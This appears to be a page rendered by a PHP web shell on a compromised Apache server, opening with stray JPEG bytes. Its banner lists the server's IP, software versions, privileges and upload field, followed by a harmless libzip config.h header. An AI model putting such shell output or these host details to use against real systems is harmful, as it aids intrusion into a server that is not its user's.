????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.137.185.239 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/zip/lib/ |
Upload File : |
#ifndef HAD_CONFIG_H #define HAD_CONFIG_H #define HAVE__CLOSE #define HAVE__DUP #define HAVE__FDOPEN #define HAVE__FILENO #define HAVE__OPEN #define HAVE__SNPRINTF /* #undef HAVE__STRCMPI */ #define HAVE__STRDUP #define HAVE__STRICMP /* #undef HAVE_FSEEKO */ /* #undef HAVE_FTELLO */ /* #undef HAVE_MKSTEMP */ #define HAVE_MOVEFILEEXA /* #undef HAVE_SNPRINTF */ /* #undef HAVE_STRCASECMP */ /* #undef HAVE_STRINGS_H */ /* #undef HAVE_STRUCT_TM_TM_ZONE */ /* #undef HAVE_UNISTD_H */ #define PACKAGE "libzip" #define VERSION "0.10.b" /* #undef HAVE_SSIZE_T */ #ifndef HAVE_SSIZE_T #ifndef SIZE_T_LIBZIP #define SIZE_T_LIBZIP 4 #endif #ifndef INT_LIBZIP #define INT_LIBZIP 4 #endif #ifndef LONG_LIBZIP #define LONG_LIBZIP 4 #endif #ifndef LONG_LONG_LIBZIP #define LONG_LONG_LIBZIP 8 #endif #ifndef SIZEOF_OFF_T #define SIZEOF_OFF_T 4 #endif # if SIZE_T_LIBZIP == INT_LIBZIP # ifndef ssize_t typedef int ssize_t; # endif # elif SIZE_T_LIBZIP == LONG_LIBZIP typedef long ssize_t; # elif SIZE_T_LIBZIP == LONG_LONG_LIBZIP typedef long long ssize_t; # else #error no suitable type for ssize_t found # endif #endif # undef strcasecmp # define strcasecmp _strcmpi #endif /* HAD_CONFIG_H */